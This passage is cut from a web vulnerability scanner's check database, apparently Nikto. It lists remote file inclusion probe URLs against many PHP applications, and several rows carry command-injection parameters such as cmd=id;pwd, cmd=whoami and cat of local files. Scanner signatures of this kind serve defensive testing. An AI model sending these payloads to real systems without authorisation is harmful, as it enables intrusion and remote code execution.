list.\",\"\",\"\"\n\"005961\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/templates/text-only/template.tpl.php?renderer=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005962\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/templates/tmpl_dfl/scripts/index.php?dir[inc]=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005963\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/theme/breadcrumb.php?rootBase=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005964\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/theme/default.php?root=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005965\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/theme/format.php?_page_content=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005966\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/theme/format.php?_page_css=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005967\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/theme/frames1.php?root=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005968\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/theme/frames1_center.php?root=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005969\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/theme/frames1_left.php?root=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005970\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/theme/frames1_top.php?root=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005971\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/theme/phpAutoVideo/LightTwoOh/sidebar.php?loadpage=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005972\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/theme/settings.php?pfad_z=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005973\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/theme/test1.php?root=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005974\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/theme/test2.php?root=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005975\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/theme/test3.php?root=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005976\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/theme/test4.php?root=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005977\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/theme/test5.php?root=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005978\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/theme/test6.php?root=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005979\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/themes.php?GLOBALS[theme_path]=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005980\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/themes/blackorange.php?root=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005981\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/themes/container.php?theme_directory=@RFIURL%00\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005982\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/themes/default/layouts/standard.php?page_include=@RFIURL?&act=cmd&cmd=whoami&d=/&submit=1&cmd_txt=1\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005983\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/themes/default/preview_post_completo.php?dir=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005984\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/themes/header.php?theme_directory=@RFIURL%00\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005985\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/themes/ubb/login.php?theme=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005986\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/themes/ubb/login.php?theme=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005987\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/thumbnail.php?module=gallery&GLOBALS[PTH][classes]=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005988\",\"CVE-2007-5423\",\"c\",\"/tikiwiki/tiki-graph_formula.php?w=1&h=1&s=1&min=1&max=2&f[]=x.tan.phpinfo()&t=png&title=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"TikiWiki contains a vulnerability which allows remote attackers to execute arbitrary PHP code.\",\"\",\"\"\n\"005989\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/timedifference.php?la=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005990\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/toolbar.loudmouth.php?mainframe=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005991\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/tools/update_translations.php?_SESSION[path]=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005992\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/top.php?laypath=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005993\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/toplist.php?f=toplist_top10&phpbb_root_path=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005994\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/topsites/index.php?page=@RFIURL?&cmd=uname%20-a\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005995\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/towels-0.1/src/scripture.php?pageHeaderFile=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005996\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/track.php?path=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005997\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/tsep/include/colorswitch.php?tsep_config[absPath]=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005998\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/tsep/include/colorswitch.php?tsep_config[absPath]=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005999\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/ttCMS_path/lib/db/ez_sql.php?lib_path=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"006000\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/twebs/modules/misc/usermods.php?ROOT=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"006001\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/ubbt.inc.php?GLOBALS[thispath]=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"006002\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/unavailable.php?bibtexrootrel=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"006003\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/unsubs.php?scdir=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"006004\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/up.php?my[root]=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"006005\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/upload.php?save_path=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"006006\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/upload/admin/frontpage_right.php?loadadminpage=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"006007\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/upload/top.php?maindir=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"006008\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/upload/xax/admin/modules/install_module.php?level=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"006009\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/upload/xax/admin/patch/index.php?level=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"006010\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/upload/xax/ossigeno/admin/install_module.php?level=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"006011\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/upload/xax/ossigeno/admin/uninstall_module.php?level=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"006012\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/upload_local.php?target=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"006013\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/upload_multi.php?target=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"006014\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/urlinn_includes/config.php?dir_ws=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"006015\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/user.php?caselist[bad_file.txt][path]=@RFIURL&command=cat%20@LFI(abs)\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"006016\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/user_language.php?INDM=r3d.w0rm&language_dir=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"006017\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/user_new_2.php?home=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"006018\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/usr/extensions/get_calendar.inc.php?root_path=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"006019\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/usr/extensions/get_infochannel.inc.php?root_path=@RFIURL?cmd=id;pwd\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"006020\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/usr/extensions/get_tree.inc.php?GLOBALS[\\\"root_path\\\"]=@RFIURL?cmd=id;pwd\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"006021\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/usr/extensions/get_tree.inc.php?GLOBALS[root_path]=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"006022\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/utilitaires/gestion_sondage.php?repertoire_visiteur=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"006023\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/utilitaires/gestion_sondage.php?repertoire_visiteur=@RFIURL?&cmd=ls\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"006024\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/utils/class_HTTPRetriever.php?libcurlemuinc=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"006025\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/v-webmail/includes/mailaccess/pop3.php?CONFIG[pear_dir]=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"006026\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/vCard/admin/define.inc.php?match=@RFIURL?&cmd=id\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"006027\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/vb/includes/functions.php?classfile=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"006028\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/vb/includes/functions_cron.php?nextitem=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"006029\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/vb/includes/functions_forumdisplay.php?specialtemplates=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"006030\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/vbgsitemap/vbgsitemap-config.php?base=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"006031\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/vbgsitemap/vbgsitemap-vbseo.php?base=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"006032\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/vedit/editor/edit_htmlarea.php?highlighter=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"006033\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/viart_cms-3.3.2/blocks/block_site_map.php?root_folder_path=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"006034\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/view.php?ariadne=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"006035\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/view.php?id=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"006036\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/view_func.php?i=@RFIURL&l=testfile.txt?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"006037\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/views/print/printbar.php?views_path=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"006038\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/visible_count_inc.php?statitpath=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"006039\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/visitor.php?_SERVER[DOCUMENT_ROOT]=@RFIURL??\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"006040\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/volume.php?config[public_dir]=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"006041\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/vote.php?Madoa=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"006042\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/votebox.php?VoteBoxPath=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"006043\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/vp/configure.php?phpbb_root_path=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"006044\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/vwebmail/includes/mailaccess/pop3/core.php?CONFIG[pear_dir]=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"006045\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/w-agora_path/add_user.php?bn_dir_default=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"006046\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/w-agora_path/create_forum.php?bn_dir_default=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"006047\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/w-agora_path/create_user.php?bn_dir_default=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"006048\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/w-agora_path/delete_notes.php?bn_dir_default=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"006049\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/w-agora_path/delete_user.php?bn_dir_default=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"006050\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/w-agora_path/edit_forum.php?bn_dir_default=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"006051\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/w-agora_path/mail_users.php?bn_dir_default=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"006052\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/w-agora_path/moderate_notes.php?bn_dir_default=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"006053\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/w-agora_path/reorder_forums.php?bn_dir_default=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"006054\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/wamp_dir/setup/yesno.phtml?no_url=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"006055\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/wapchat/src/eng.adCreate.php?sysFileDir=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"006056\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/wapchat/src/eng.adCreateSave.php?sysFileDir=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"006057\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/wapchat/src/eng.adDispByTypeOptions.php?sysFileDir=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"006058\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/wapchat/src/eng.createRoom.php?sysFileDir=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"006059\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/wapchat/src/eng.forward.php?sysFileDir=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"006060\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/wapchat/src/eng.pageLogout.php?sysFileDir=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"006061\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/wapchat/src/eng.resultMember.php?sysFileDir=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"006062\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/wapchat/src/eng.roomDeleteConfirm.php?sysFileDir=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"006063\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/wapchat/src/eng.saveNewRoom.php?sysFileDir=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"006064\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/wapchat/src/eng.searchMember.php?sysFileDir=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"006065\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/wapchat/src/eng.writeMsg.php?sysFileDir=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"006066\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/war.php?vwar_root=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"006067\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/war.php?vwar_root=@RFIURL?&cmd=ls\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"006068\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/warn.php?file=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"006069\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/watermark.php?GALLERY_BASEDIR=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"006070\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/wbxml/WBXML/Decoder.php?base_dir=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"006071\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/wbxml/WBXML/Encoder.php?base_dir=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"006072\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/web/Administration/Includes/configureText.php?path_prefix=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"006073\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/web/Administration/Includes/contentHome.php?path_prefix=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"006074\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/web/Administration/Includes/deleteContent.php?path_prefix=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"006075\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/web/Administration/Includes/deleteUser.php?path_prefix=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"006076\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/web/Administration/Includes/userHome.php?path_prefix=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"006077\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/web/BetaBlockModules//Module/Module.php?path_prefix=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI 